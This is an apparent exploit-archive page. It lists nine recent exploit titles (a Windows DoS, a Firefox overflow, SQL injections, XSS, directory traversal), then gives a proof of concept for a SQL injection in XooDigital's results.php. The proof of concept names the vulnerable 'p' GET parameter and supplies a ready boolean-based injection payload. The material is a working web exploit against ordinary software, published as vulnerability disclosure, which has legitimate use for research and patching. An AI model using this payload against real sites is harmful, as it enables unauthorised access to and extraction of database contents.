
9 changes to exploits/shellcodes Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC) Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting XooGallery - Multiple SQL Injection XooDigital - 'p' SQL Injection Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion SJS Simple Job Script - SQL Injection / Cross-Site Scripting
14 lines
No EOL
450 B
Text
14 lines
No EOL
450 B
Text
# Exploit Title: XooDigital - 'p' SQL Injection
|
|
# Date: 26.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://xooscripts.com/product/digital-download-protection-script.html
|
|
# Demo Site: http://xooscripts.com/demos/xoodigital/
|
|
# Version: Lastest
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
----- PoC : SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/results.php?p=1
|
|
Vulnerable Parameter: p (GET)
|
|
Payload: p=1') OR NOT 7970=7970# |